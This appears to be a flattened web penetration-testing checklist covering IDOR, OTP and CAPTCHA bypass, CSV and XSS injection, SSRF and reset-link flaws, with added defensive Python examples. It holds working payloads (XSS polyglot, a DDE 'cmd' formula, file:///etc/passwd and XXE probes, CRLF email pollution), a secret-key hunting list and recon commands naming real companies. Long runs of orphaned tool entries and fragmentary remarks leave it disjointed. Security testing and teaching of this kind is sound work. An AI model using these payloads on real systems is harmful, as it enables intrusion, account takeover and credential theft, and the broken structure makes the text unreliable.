3. Can user 'A' post an enquiry on behalf of user 'B' from his own account?

Fund transfer testing

1. Is it possible to transfer funds to user 'C' instead of user 'B' from user 'A', when the transfer was intended to go from user 'A' to user 'B'?
2. Can the fund transfer amount be manipulated?
3. Can user 'A' modify the payee list of user 'B' by parameter manipulation using his/her own account?
4. Is it possible to add a payee without proper validation in user 'A''s own account or to user 'B''s account?
Scheduled transfer testing
1. Can user 'A' view the scheduled transfers of user 'B'?
2. Can user 'A' change the details of a scheduled transfer for user 'B'?
Testing of fund transfer via NEFT
1. Amount manipulation via NEFT transfer.
2. Check if user 'A' can view the NEFT transfer details of user 'B'.
Testing for Bill Payment
1. Check if a user can register a payee without any checker approval
2. Check if user 'A' can view the pending payments of user 'B'
3. Check if user 'A' can view the payments-made details of user 'B'
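Almost every item in the banking section above, and the cart/booking items earlier (view another user's cart, booking, refund), is the same defect: the handler looks up whatever object id the client sent without checking that the caller owns it. As an added example that is not part of the original checklist, here is that defect beside the ownership check that fixes it, plus the server-side checks for the fund-transfer tests (amount, source ownership, payee) and a tester-side probe that reports which ids leak. The account data, user names and account ids are constructed for the example.

```python
from typing import Callable, Dict, List, Optional

# Constructed data: two customers, their accounts and statements.
ACCOUNTS: Dict[str, Dict] = {
    "ACC-1001": {"owner": "userA", "balance": 500.0},
    "ACC-2002": {"owner": "userB", "balance": 9000.0},
}
STATEMENTS = {"ACC-1001": ["2024-01 statement for A"],
              "ACC-2002": ["2024-01 statement for B"]}

class Forbidden(Exception):
    """Raised when the calling user does not own the requested object."""

def statement_vulnerable(session_user: str, account_id: str) -> Optional[List[str]]:
    """Returns whatever account the client named: a horizontal IDOR."""
    return STATEMENTS.get(account_id)

def _owned(session_user: str, account_id: str) -> Dict:
    """Object-level authorization: the account must exist AND belong to the
    authenticated user; the account id in the request proves nothing."""
    acct = ACCOUNTS.get(account_id)
    if acct is None or acct["owner"] != session_user:
        raise Forbidden(f"{session_user} does not own {account_id}")
    return acct

def statement_fixed(session_user: str, account_id: str) -> List[str]:
    _owned(session_user, account_id)
    return STATEMENTS[account_id]

def transfer_fixed(session_user: str, src: str, dst: str, amount) -> float:
    """Fund transfer with the server-side checks the tests above probe for:
    the source must be the caller's, the amount positive and covered, and the
    destination must be a known account."""
    source = _owned(session_user, src)
    if not isinstance(amount, (int, float)) or isinstance(amount, bool):
        raise ValueError("amount must be numeric")
    if amount <= 0 or amount > source["balance"]:
        raise ValueError("amount out of range")
    if dst not in ACCOUNTS:
        raise ValueError("unknown payee")
    source["balance"] -= amount
    ACCOUNTS[dst]["balance"] += amount
    return source["balance"]

def probe_idor(handler: Callable, session_user: str, candidate_ids: List[str]) -> List[str]:
    """Tester side: call the endpoint as one user with other users' ids and
    report which ones return data instead of a refusal."""
    leaked = []
    for cid in candidate_ids:
        try:
            if handler(session_user, cid) is not None:
                leaked.append(cid)
        except Forbidden:
            pass
    return leaked

if __name__ == "__main__":
    ids = ["ACC-1001", "ACC-2002"]
    print("vulnerable leaks:", probe_idor(statement_vulnerable, "userA", ids))
    print("fixed leaks     :", probe_idor(statement_fixed, "userA", ids))
```

On a real engagement the candidate ids come from your own account (your cart id, booking reference or customer id) plus neighbours of it; a sequential id space makes the probe trivial, which is why the checklist also asks whether such ids are guessable.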
SOAP message tampering
1. Bruteforcing using *
2. Bruteforcing using user credentials
3. Parameter guessing
Convert GET to POST and POST to GET methods
SQL Injection
1. ' " - * )
Directory traversal
../../../../../autoexec.bat
XML Poisoning
Enumeration and profiling (from the WSDL)
1. <service> - Web service
2. <operation> - Web methods
3. <element> - Data types
4. <endpoint> - Web service address
Use automated scanners one by one against the application
Replay attack
1. Send an old captcha value; if it is accepted then it is vulnerable.
2. Send an old captcha value with the old session ID; if it is accepted then it is vulnerable.

Check whether the captcha is retrievable via an absolute path such as
www.chintan.com/internal/captcha/images/24.png

Check for server-side validation of the CAPTCHA
1. Remove the captcha block from the GUI using the Firebug addon and submit the request to the server.
Check whether image recognition can be done with an OCR tool
a. If OCR identifies it, report as weak strength of captcha - OCR (Optical Character Recognition)
b. If not, then secure.
Check for SSRF by giving www.chintan.com:22, www.chintan.com:23 etc. Check the response page and determine whether port 22 is open on the chintan website. If the response differs by port, the target is vulnerable to SSRF.
Check for
- Clickjacking on sensitive actions
- X-XSS-Protection header
- HSTS header
- CSP header
- Referrer-Policy
- Cache-Control
- Public-Key-Pins
- X-WebKit-CSP

Formula (CSV) injection through CSV export.

1. Consider a scenario where you can export the list of registered users or group members through the application portal.
2. Write =2*10 in first name, last name etc.
3. Export the CSV and check whether the formula executed successfully or not.
4. If the result shows 20 in first name, the export is vulnerable; a DDE-style formula in the same field can be used to spread malware through the CSV.
DDoS using xmlrpc.php

If the website has a feature for importing contacts from .CSV files then
1. Add one contact in your CSV file with the name "><script>alert("XSS")</script>
2. Import the contact to the website
3. Check whether the script gets executed or not.

CSV Excel Macro Injection
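The =2*10 probe above and the export that neutralises it, as an added example that is not part of the original checklist. is_formula is the detection side (the same test applies to values arriving through the CSV import feature); neutralize_cell and export_fixed are the export side. The user rows are constructed for the example.

```python
import csv
import io
from typing import Iterable, List

# Cell prefixes that Excel/LibreOffice interpret as the start of a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def is_formula(cell: str) -> bool:
    """Detection side: flag a value that a spreadsheet would evaluate."""
    return cell.startswith(FORMULA_TRIGGERS)

def neutralize_cell(value) -> str:
    """Export side: real numbers pass through; text that starts with a trigger
    is prefixed with a single quote so the spreadsheet treats it as a string."""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = "" if value is None else str(value)
    return "'" + text if is_formula(text) else text

def export_vulnerable(rows: Iterable[List]) -> str:
    """Writes user-controlled fields verbatim: the =2*10 probe survives."""
    buf = io.StringIO()
    csv.writer(buf).writerows(rows)
    return buf.getvalue()

def export_fixed(rows: Iterable[List]) -> str:
    buf = io.StringIO()
    csv.writer(buf, quoting=csv.QUOTE_ALL).writerows(
        [[neutralize_cell(c) for c in row] for row in rows])
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed user list: the first_name field carries the =2*10 probe from
    # the checklist and a DDE-style payload of the kind step 4 warns about.
    users = [["first_name", "last_name", "age"],
             ["=2*10", "Smith", 30],
             ["=cmd|' /C calc'!A0", "Jones", -1]]
    print(export_vulnerable(users))
    print(export_fixed(users))
```

Quoting alone is not a fix: Excel strips the CSV quotes and still evaluates a quoted =2*10, which is why the apostrophe prefix is needed as well. The prefix is visible in the imported cell; that is the accepted cost of making the value inert.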

Find metadata for the downloadable objects
Review image files, PDF files and other objects' metadata for information leakage
Test the Rich Internet Application (RIA) cross-domain policy
1. Try to access crossdomain.xml
2. Try to access clientaccesspolicy.xml
Testing for role authorization
1. Check whether a normal user can access the resources of high-privileged users
2. Forced browsing
3. Insecure direct object reference
4. Parameter tampering to switch the user account to a high-privileged user.
No rate limiting on forms:
- Registration
- Login
- Email triggering
- SMS triggering
Test for OTP
1. Try injection to bypass OTP verification
2. Check for guessable OTP codes
3. Check the response in order to bypass the OTP.
4. Give ' in the OTP and check whether you can bypass it or not.
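The OTP tests here and under Banking (bypass, reuse, extending validity by parameter tampering) and the CAPTCHA replay tests (old value, old value with old session) all probe the same server-side store, so one added example serves both; it is not part of the original checklist. ChallengeStore binds each answer to the issuing session, makes it single-use, expires it on a server-side clock that no request parameter can extend, and bounds the number of guesses so a 6-digit code cannot be bruteforced. verify_weak keeps the answer live after use and never expires it, which is what the replay tests detect. The class, the 120-second TTL and the 5-guess limit are assumptions; the clock is injectable so expiry can be exercised offline.

```python
import hmac
import secrets
import time
from typing import Callable, Dict, List

class ChallengeStore:
    """Server-side store for OTP / CAPTCHA answers: bound to one session,
    single-use, expiring, with a bounded number of guesses."""
    MAX_ATTEMPTS = 5      # assumed limit; well below the 10**6 code space
    TTL = 120             # seconds; server-side, not a client parameter

    def __init__(self, now: Callable[[], float] = time.time) -> None:
        self._now = now
        self._pending: Dict[str, List] = {}   # session_id -> [answer, issued_at, attempts]

    def issue(self, session_id: str, digits: int = 6) -> str:
        answer = f"{secrets.randbelow(10 ** digits):0{digits}d}"
        self._pending[session_id] = [answer, self._now(), 0]
        return answer    # delivered out of band (SMS / image), never in the HTTP response

    def verify(self, session_id: str, guess: str) -> bool:
        rec = self._pending.get(session_id)
        if rec is None:
            return False                         # nothing issued to THIS session
        answer, issued, attempts = rec
        if self._now() - issued > self.TTL or attempts >= self.MAX_ATTEMPTS:
            del self._pending[session_id]        # expired or locked: force a re-issue
            return False
        rec[2] += 1
        ok = hmac.compare_digest(answer, str(guess))
        if ok:
            del self._pending[session_id]        # single use: a replay finds nothing
        return ok

    def verify_weak(self, session_id: str, guess: str) -> bool:
        """The failing implementation: the answer stays valid after use and
        never expires, so an old value (or an old value with the old session)
        is accepted again."""
        rec = self._pending.get(session_id)
        return rec is not None and rec[0] == str(guess)

if __name__ == "__main__":
    store = ChallengeStore()
    code = store.issue("session-1")
    print("first use :", store.verify("session-1", code))
    print("replay    :", store.verify("session-1", code))
    code = store.issue("session-1")
    print("weak, twice:", store.verify_weak("session-1", code), store.verify_weak("session-1", code))
```

The "response manipulation" OTP bypass is not something this store can prevent on its own: the result of verify must be the only thing the application trusts, so a handler that also reads a success flag from the client's request or lets the client re-submit with a different mobile number (the additional scenario below) is still broken.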

Additional scenario
While signing up as a new user, the OTP is sent to the mobile number registered with the account. Submit the OTP value from your mobile device and intercept the request. Edit the mobile number to an already registered number. You can then log in as another user in the application and perform actions on his behalf. The response includes the user's email address, name and contact number.

If you find a phpinfo.php file, check for configuration leakage and try to exploit any network vulnerability.

Bypass SAML authentication by response tampering

If the CSP header blocks the clickjacking attack and an origin parameter is present in the original request, then this can be bypassed by adding unicode characters in the value of the origin header.

Use the PATCH HTTP method to find information disclosure

Check whether the application uses any ipAddress parameter or not. If yes, then a decimal IP address can be converted into a real IP for information disclosure.

ImageMagick GIF coder vulnerability leads to memory disclosure

If the Git repository (.git) is found on the server, then try to download the entire source code of the website using the git-dumper tool.

Check for the Unsubscribe button
1. Subscribe an email id
2. Unsubscribe and check whether the website confirms first or sends any notification to the user or not.
a. if yes - not vulnerable
b. if no - vulnerable (affects availability)

If a website has a username enumeration issue then it becomes a high-to-medium level issue.

Check whether the application allows us to download an Excel file; if yes, download the Excel file, unzip it and open the XML inside.
Add your custom XXE payload (/etc/passwd) and upload it to the server.
If the server is IIS 7 then test for:
- IIS Short Name scanner
- HTTP.sys DoS / RCE
Inspect all JS files, you might get lucky.
Executable download - No secure integrity check
Directory listing - Non-sensitive data exposure.
Potentially unsafe HTTP methods enabled: OPTIONS, PUT, DELETE
Reflected file download
Parameter Pollution - Social Media Sharing Buttons
Full path disclosure
Internal IP disclosure
Outdated software versions
Sensitive application data stored unencrypted - Internal storage
Unsafe Cross-Origin Resource Sharing
WordPress testing
- enumerate vulnerable plugins
- enumerate vulnerable themes
- enumerate email addresses and usernames
- bruteforce using a custom wordlist against WordPress
Use searchsploit to find custom exploits
Use Metasploit to find custom exploits
- use the Metasploit check option to check whether the target is exploitable or not
- remember to set TARGETURI for successful exploitation
Secret key names to search for (Find secrets using Burp Extension):
google_server_key
gsecr
heroku_api_key
heroku_key
heroku_oauth
heroku_oauth_secret
heroku_oauth_token
heroku_secret
heroku_secret_token
htaccess_pass
htaccess_user
incident_bot_name
incident_channel_name
jwt_passphrase
jwt_password
jwt_public_key
jwt_secret
jwt_secret_key
jwt_secret_token
jwt_token
jwt_user
keyPassword
location_hostname
location_protocol
log_channel
mail_driver
mail_encryption
mail_from_address
mail_from_name
mail_host
mail_password
mail_port
mail_username
mailgun_key
mailgun_secret
mix_pusher_app_cluster
mix_pusher_app_key
mysql_password
node_env
oauth
oauth_discord_id
oauth_discord_secret
oauth_key
oauth_token
oauth2_secret
password
paypal_identity_token
paypal_sandbox
paypal_secret
paypal_token
playbooks_url
postgres_password
private
private_key
pusher_app_cluster
pusher_app_id
pusher_app_key
pusher_app_secret
queue_connection
queue_driver
redis_host
redis_password
redis_port
response_auth_jwt_secret
response_data_secret
response_data_url
root_password
sa_password
secret
secret_access_key
Take GF patterns and search through the application
Jales Signature Scan
FavFreak
gitGraber
Arjun
Manually find and click external links on the target site (for example, links to social media accounts or some external media link).

While doing the manual work, also run broken-link-checker in the background using the command below in the terminal.

blc -rof --filter-level 3 https://example.com/

The output will look something like:

─BROKEN─ https://www.linkedin.com/company/ACME-inc-/ (HTTP_999)

Now you need to check whether the company still has that page or not (HTTP_999 from LinkedIn is a bot-blocking response, so verify such hits by hand); if not, then register as the company or try to get that username or URL.

https://github.com/hahwul?tab=repositories

Manual hunt
Search for URL or download parameters

Try file:///etc/passwd

url=file:///etc/passwd
download=file:///etc/passwd
Tools/Technique
Dnsdumpster.com

builtwith.com

Sublist3r:
    python3 sublist3r.py -d chintan.com -p 80,443,8080,8001,8009,280,591,583,832,981,1311,2480,4444,4445,4567,5000,5104,5800,7000,7001,7002,8008,8042,8088,8222,8243,8280,8281,8333,8530,8531,8887,8888,8443,8834,9080,9443,9981,12043,12046,16080,18091,10443,18092,81,300,593,1010,1311,2082,2087,2095,2096,3000,3128,3333,4243,4711,4712,4993,5108,6543,7396,7474,8000,8001,8008,8014,8069,8080,8081,8090,8091,8118,8123,8172,8443,8500,8880,8888,8983,9000,9043,9060,9090,9091,9200,9800,12443,20720,28017

crt.sh:
    curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew

Check for third-level domains

Altdns

Assetfinder

Amass: amass enum -d target.com

Take the subdomains found by assetfinder and spider them with hakrawler to pull links out of the response content:
    assetfinder -subs-only http://tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla"

Subfinder

Gospider:
    gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew

Dirbuster or Dirb with the latest wordlist

Google dork: site:.domain.com

Find the admin panel based on the CMS, or by bruteforcing

Wappalyzer add-on

Response headers
Nmap
Breach Compilation
We Leak Info
https://hunter.io/
https://dorks.faisalahmed.me
BurpSuite Engagement Tools

Ping CMD
Give a domain name and find exposed devices, services, mail exchange servers and much more.

Perform a local WHOIS search instead of a global WHOIS domain lookup to find more information.

Nessus
Nmap (the port list goes after -p; the scan type and version flags stay together):
    nmap -sS -n -Pn -sV -p 80,443,8080,8001,8009,280,591,583,832,981,1311,2480,4444,4445,4567,5000,5104,5800,7000,7001,7002,8008,8042,8088,8222,8243,8280,8281,8333,8530,8531,8887,8888,8443,8834,9080,9443,9981,12043,12046,16080,18091,10443,18092,81,300,593,1010,1311,2082,2087,2095,2096,3000,3128,3333,4243,4711,4712,4993,5108,6543,7396,7474,8000,8001,8008,8014,8069,8080,8081,8090,8091,8118,8123,8172,8443,8500,8880,8888,8983,9000,9043,9060,9090,9091,9200,9800,12443,20720,28017 -iL target.txt -oA web_result -vvv --open
udp-proto-scanner:
    perl udp-proto-scanner.pl --file target.txt

Manual and Freemind tool.


1) Nessus scanning
2) Nexpose scanning
3) Exploit Suggestor
Qualys SSL/TLS Scan
Burpsuite Repeater
BurpSuite decoder and online websites

BurpSuite repeater

BurpSuite Repeater

BurpSuite Repeater
Burpsuite Session timeout test extender
Burpsuite Proxy
Firebug add-on (firefox)
Firebug add-on (firefox)
Burpsuite
1. Create your account on the target.
2. Request a forgot-password link.
3. Do not use that link.
4. Instead, log in with your old password and change your email address to a different one.
5. Now use the reset link that was sent to the old email. If you are still able to change your password with it, the link is not tied to the account's current email and this is a reportable bug.
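The two reset-link weaknesses this checklist tests for (a link that still works after the account's email changes, and a link whose validity depends only on a date/time parameter rather than on the user) side by side with a token scheme that passes both tests, as an added Python example; this is not code from the checklist or from any target. The HMAC key, user ids, addresses and timestamps are constructed for the demo.

```python
"""Added example: a reset-link scheme that fails the tests above, beside a hardened one.
SERVER_SECRET, the user records and the timestamps are constructed for the demo."""
import hashlib
import hmac
import secrets

SERVER_SECRET = b"demo-only-server-secret"  # assumption: key kept server-side

# --- Weak scheme: the signature covers only the expiry time, not the user -------------
def weak_make_link(email, now):
    expires = int(now) + 3600
    sig = hmac.new(SERVER_SECRET, str(expires).encode(), hashlib.sha256).hexdigest()
    return f"https://app.example/reset?email={email}&expires={expires}&sig={sig}"

def weak_verify(link, now):
    """Accepts any link whose expiry is signed and in the future; the email is never checked,
    so one valid link can be re-pointed at any other account."""
    params = dict(p.split("=", 1) for p in link.split("?", 1)[1].split("&"))
    expected = hmac.new(SERVER_SECRET, params["expires"].encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, params["sig"]) and int(params["expires"]) > now

# --- Hardened scheme: random, single-use token stored hashed and bound to the account -----
class ResetService:
    def __init__(self):
        self.users = {}   # user_id -> {"email": str}
        self.tokens = {}  # sha256(token) -> {"user_id", "email", "expires"}

    def add_user(self, user_id, email):
        self.users[user_id] = {"email": email}

    def request_reset(self, user_id, now):
        token = secrets.token_urlsafe(32)
        self.tokens[hashlib.sha256(token.encode()).hexdigest()] = {
            "user_id": user_id,
            "email": self.users[user_id]["email"],  # address the link was mailed to
            "expires": now + 3600,
        }
        return token  # this is what goes in the emailed link

    def change_email(self, user_id, new_email):
        self.users[user_id]["email"] = new_email
        # Every outstanding reset link for this account is now void.
        self.tokens = {h: t for h, t in self.tokens.items() if t["user_id"] != user_id}

    def consume(self, token, now):
        """Return the user id the link belongs to, or None. Single use and time-limited."""
        record = self.tokens.pop(hashlib.sha256(token.encode()).hexdigest(), None)
        if record is None or record["expires"] <= now:
            return None
        if record["email"] != self.users[record["user_id"]]["email"]:
            return None  # belt and braces: address changed since the link was sent
        return record["user_id"]
```

In the weak scheme the tester only has to edit `email=` (or refresh `expires=` and re-sign if the key has leaked) because nothing in the signature names the user; in the hardened one the token is a random secret that exists only as a hash on the server, is bound to the account and the address it was mailed to, dies when the email changes, and is removed on first use.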

Burpsuite and different ISP location


1. Create your account.
2. Open two browsers, e.g. Chrome and Firefox.
3. Log in in one browser (Chrome).
4. In the other browser (Firefox), log in and either change or reset your password.
5. After the change or reset succeeds, go back to the first browser and refresh the page. If you are still logged in there, the old session was not invalidated.
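What the two-browser test above is checking, as an added Python example that is not code from the checklist or from any of the applications named in the remarks: a session store in which a password change leaves every other session alive, beside one that revokes them (optionally keeping the session that made the change, the Facebook-style prompt mentioned later in the remarks). Users, passwords and the SHA-256 password "hash" are constructed for the demo; a real application would use a password KDF.

```python
"""Added example: session handling on password change. The user, the passwords and the
plain SHA-256 hashing are constructed for the demo (use a real KDF in production)."""
import hashlib
import secrets

class SessionStore:
    def __init__(self):
        self.sessions = {}   # session_id -> user_id
        self.passwords = {}  # user_id -> sha256 hex (demo only)

    def set_password(self, user_id, password):
        self.passwords[user_id] = hashlib.sha256(password.encode()).hexdigest()

    def login(self, user_id, password):
        """Issue a fresh session id on a correct password, else None."""
        if self.passwords.get(user_id) != hashlib.sha256(password.encode()).hexdigest():
            return None
        sid = secrets.token_hex(16)
        self.sessions[sid] = user_id
        return sid

    def is_logged_in(self, sid):
        return sid in self.sessions

    def change_password_vulnerable(self, sid, new_password):
        """The C2FO behaviour from the remarks: the password changes, every session survives."""
        self.set_password(self.sessions[sid], new_password)

    def change_password(self, sid, new_password, keep_current=True):
        """Rotate the password and destroy the account's other sessions; with
        keep_current=False the caller's own session is destroyed too."""
        user_id = self.sessions[sid]
        self.set_password(user_id, new_password)
        for other, owner in list(self.sessions.items()):
            if owner == user_id and (other != sid or not keep_current):
                del self.sessions[other]

def demo():
    """Run the two-browser test against both code paths and report who stays logged in."""
    store = SessionStore()
    store.set_password("victim", "old-pass")
    chrome = store.login("victim", "old-pass")    # the victim's own browser
    firefox = store.login("victim", "old-pass")   # the attacker, holding the stolen password

    store.change_password_vulnerable(chrome, "new-pass")
    attacker_alive_after_vulnerable_change = store.is_logged_in(firefox)

    store.change_password(chrome, "newer-pass")
    attacker_alive_after_fixed_change = store.is_logged_in(firefox)
    victim_alive_after_fixed_change = store.is_logged_in(chrome)
    return {
        "vulnerable": attacker_alive_after_vulnerable_change,
        "fixed_attacker": attacker_alive_after_fixed_change,
        "fixed_victim": victim_alive_after_fixed_change,
    }

if __name__ == "__main__":
    print(demo())
```

The detection is the same in both directions: after the change, the session that did not perform it must be rejected. Password reset (as opposed to change) should take the `keep_current=False` path, because whoever triggered the reset may not be sitting at any of the existing sessions.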
1) Firefox
2) Chrome
3) Internet Explorer

Manual
Manual
Manual
Burpsuite
Manual

Manual

Manual

1) Burpsuite
2) Manual

Manual

1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
SSL/TLS lock

Burpsuite intruder with time throttle option

CewL
Transmute

1. Register two accounts with any two mobile numbers (for the first one, enter the correct OTP).
2. Intercept your request.
3. Click Action -> Do intercept -> Intercept response to this request.
4. Check what the response contains, e.g. status:1.
5. Follow the same procedure with the other account, but this time enter a wrong OTP.
6. Intercept the response to the request.
7. You will see a message like status:0.
8. Change the status to 1, i.e. status:1, and forward the response. If you end up logged in, you have just bypassed authentication.
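Why step 8 works on some applications and not on others, as an added Python example (not code from the checklist or from any target): the bypass succeeds when the password step already created a fully privileged session and the OTP response is only a hint for the front end. When the server keeps the session in a pre-auth state until it has verified the OTP itself, rewriting status:0 to status:1 only changes what the browser tries to show. The accounts, passwords and OTP values are constructed for the demo.

```python
"""Added example: the OTP response-tampering bypass against two server designs.
USERS, the passwords and the OTP codes are constructed for the demo."""
import secrets

class VulnerableOtpLogin:
    """Issues a real session at password time; the OTP call just returns a flag that the
    front end uses to decide whether to navigate to the dashboard."""
    def __init__(self, users):
        self.users = users      # user -> {"password": ..., "otp": ...}
        self.sessions = {}      # sid -> user

    def login(self, user, password):
        if self.users[user]["password"] != password:
            return None
        sid = secrets.token_hex(16)
        self.sessions[sid] = user   # already fully authenticated server-side
        return sid

    def verify_otp(self, sid, otp):
        user = self.sessions[sid]
        return {"status": 1 if otp == self.users[user]["otp"] else 0}

    def dashboard(self, sid):
        return "dashboard" if sid in self.sessions else "forbidden"

class HardenedOtpLogin:
    """The password only creates a pre-auth session; the server flips it to authenticated
    after a correct OTP, so the JSON body is informational only."""
    def __init__(self, users):
        self.users = users
        self.sessions = {}      # sid -> {"user": ..., "otp_ok": bool}

    def login(self, user, password):
        if self.users[user]["password"] != password:
            return None
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": user, "otp_ok": False}
        return sid

    def verify_otp(self, sid, otp):
        sess = self.sessions[sid]
        if otp == self.users[sess["user"]]["otp"]:
            sess["otp_ok"] = True   # the only place the session becomes usable
            return {"status": 1}
        return {"status": 0}

    def dashboard(self, sid):
        sess = self.sessions.get(sid)
        return "dashboard" if sess and sess["otp_ok"] else "forbidden"

def client_flow(server, user, password, otp, tamper=False):
    """Mimic the browser: follow the JSON status, optionally after the intercepted
    response has been rewritten from status:0 to status:1 (step 8 above)."""
    sid = server.login(user, password)
    response = server.verify_otp(sid, otp)
    if tamper:
        response = {"status": 1}
    if response["status"] != 1:
        return "stuck-on-otp-page"
    return server.dashboard(sid)

# Constructed test account (assumption).
USERS = {"alice": {"password": "correct-horse", "otp": "123456"}}

if __name__ == "__main__":
    for name, cls in (("vulnerable", VulnerableOtpLogin), ("hardened", HardenedOtpLogin)):
        print(name, "wrong OTP + tampered response ->",
              client_flow(cls(USERS), "alice", "correct-horse", "000000", tamper=True))
```

The Burp check that tells the two designs apart is step 8 itself: after forwarding the edited response, request a page that needs a logged-in user and see whether the server, not the front end, serves it.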
Burpsuite

Burpsuite
Burpsuite
Burpsuite
Burpsuite

Burpsuite
Burpsuite

Burpsuite

Burpsuite

Manual

Manual

1) Burpsuite
2) Manual

Manual
Manual

Manual
1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual
1) Burpsuite
2) Manual
email=victim
email=victim@xyz
(in the payloads below, victim@xyz.tld and attacker@xyz.tld stand for the target's and the tester's addresses)
{"email":["victim@xyz.tld","attacker@xyz.tld"]}
email=victim@xyz.tld,attacker@xyz.tld
email=victim@xyz.tld%20attacker@xyz.tld
email=victim@xyz.tld|attacker@xyz.tld
email=victim@xyz.tld%0a%0dcc:attacker@xyz.tld
email=victim@xyz.tld&email=attacker@xyz.tld
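The server-side check that defeats every payload in the list above (repeated parameter, JSON array, comma/space/pipe-separated pairs, and CRLF into a Cc: header), as an added Python example that is not code from the checklist. The addresses and request bodies are constructed for the demo; the function returns exactly one well-formed address or None, so the reset mail can never go to two recipients.

```python
"""Added example: strict extraction of the reset-form email field. Bodies and addresses
are constructed placeholders."""
import json
import re
from urllib.parse import parse_qs

# Deliberately conservative: one local part, one domain, no separators or control characters.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
FORBIDDEN = "\r\n\t ,;|&"   # anything that could smuggle a second recipient or a header

def extract_reset_email(body, content_type="application/x-www-form-urlencoded"):
    """Return the single address in the request, or None if there is not exactly one."""
    if content_type == "application/json":
        try:
            value = json.loads(body).get("email")
        except (ValueError, AttributeError):
            return None
        values = value if isinstance(value, list) else [value]
    else:
        # parse_qs keeps every value for a repeated key, so pollution shows up as len > 1
        values = parse_qs(body, keep_blank_values=True).get("email", [])
    if len(values) != 1 or not isinstance(values[0], str):
        return None
    candidate = values[0]
    if any(ch in candidate for ch in FORBIDDEN):
        return None
    return candidate if EMAIL_RE.fullmatch(candidate) else None

# The form-encoded payloads from the list above, with constructed placeholder addresses.
FORM_PAYLOADS = [
    "email=victim@xyz.tld&email=attacker@xyz.tld",
    "email=victim@xyz.tld,attacker@xyz.tld",
    "email=victim@xyz.tld%20attacker@xyz.tld",
    "email=victim@xyz.tld|attacker@xyz.tld",
    "email=victim@xyz.tld%0a%0dcc:attacker@xyz.tld",
]
JSON_PAYLOAD = '{"email":["victim@xyz.tld","attacker@xyz.tld"]}'

def rejected_payloads():
    """True when every pollution payload is refused and the honest request is accepted."""
    honest_ok = extract_reset_email("email=victim@xyz.tld") == "victim@xyz.tld"
    forms_rejected = all(extract_reset_email(p) is None for p in FORM_PAYLOADS)
    json_rejected = extract_reset_email(JSON_PAYLOAD, "application/json") is None
    return honest_ok and forms_rejected and json_rejected

if __name__ == "__main__":
    for p in FORM_PAYLOADS:
        print(repr(p), "->", extract_reset_email(p))
    print("all pollution payloads rejected:", rejected_payloads())
```

The reason to reject rather than "take the first value" is that frameworks disagree on which value wins for a repeated key (first, last, or a list), and the mail layer may split on commas or newlines that the web layer passed through untouched; refusing ambiguous input removes the disagreement.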
1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

Burpsuite
Burpsuite

1) Burpsuite
2) Manual
1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual
1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

1) Burpsuite
2) Manual

Burpsuite

Burpsuite

www.w3schools.com
Burpsuite

Burpsuite
gifsicle - Tool to bind javascript within GIF
Burpsuite

Terminal

Burpsuite

0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"

javascript:alert(123)

/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"/-alert(1)//><img src=1 onerror=alert(1)>'

); alert(document.domain); if (1
Burpsuite

Burpsuite

Burpsuite

Excessively Privileged User / DBA

python3.8 oralyzer.py -f urls.txt

Burpsuite

Burpsuite
1) Burpsuite
2) Manual

Burpsuite
Burpsuite
Burpsuite
Burpsuite
Burpsuite
Burpsuite

Burpsuite
Burpsuite Repeater

Burpsuite

Burpsuite

Burpsuite
Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite

Burpsuite
Burpsuite

Burpsuite
Burpsuite

Burpsuite
1) Burpsuite
2) Netsparker

Burpsuite

Manual

Firebug addon

http://www.free-ocr.com/

Manual

Manual
Burpsuite Repeater

Manual

Manual

Burpsuite metadata extender


Burpsuite plugin for Metadata
Manual
Nikto
W3af

Manual
Burpsuite
Manual
Burpsuite Intruder

Manual
Burpsuite

For example:

https://myaccount.google.com/u/0/brandaccounts/group/{your-group-id}/managers?originProduct=AC&origin=https://%0d.business.google.com

https://www.smartconversion.com/unit_conversion/IP_Address_Converter.aspx

https://github.com/neex

https://github.com/arthaud/git-dumper
    python3 git-dumper.py $name /root/Desktop/tools/web/git-dumper/output

Manual

Manual
Manual

Manual
BurpSuite
Burpsuite
Manual

Burpsuite
Manual
Manual
Manual
Manual
Manual
Manual
Manual
Manual

Manual

Manual

Manual

https://github.com/vsec7/BurpSuite-Xkeys

https://github.com/1ndianl33t/Gf-Patterns/
cat list_target.txt | jaeles scan -c 100 -s <signature>
https://github.com/devanshbatham/FavFreak
https://github.com/hisxo/gitGraber
https://github.com/s0md3v/Arjun
https://github.com/jhaddix/
Remarks
An old link becomes valid again if the date and time parameter's value is changed to a fresh one. That means the link depends only on the date/time, not on the user, and is therefore valid across all users.
account. After learning that your ID has been compromised, what will you do? I guess the first thing that will pop into your head is "I should change my password!", and you will change the password. Most users just change their password when they recover their ID.

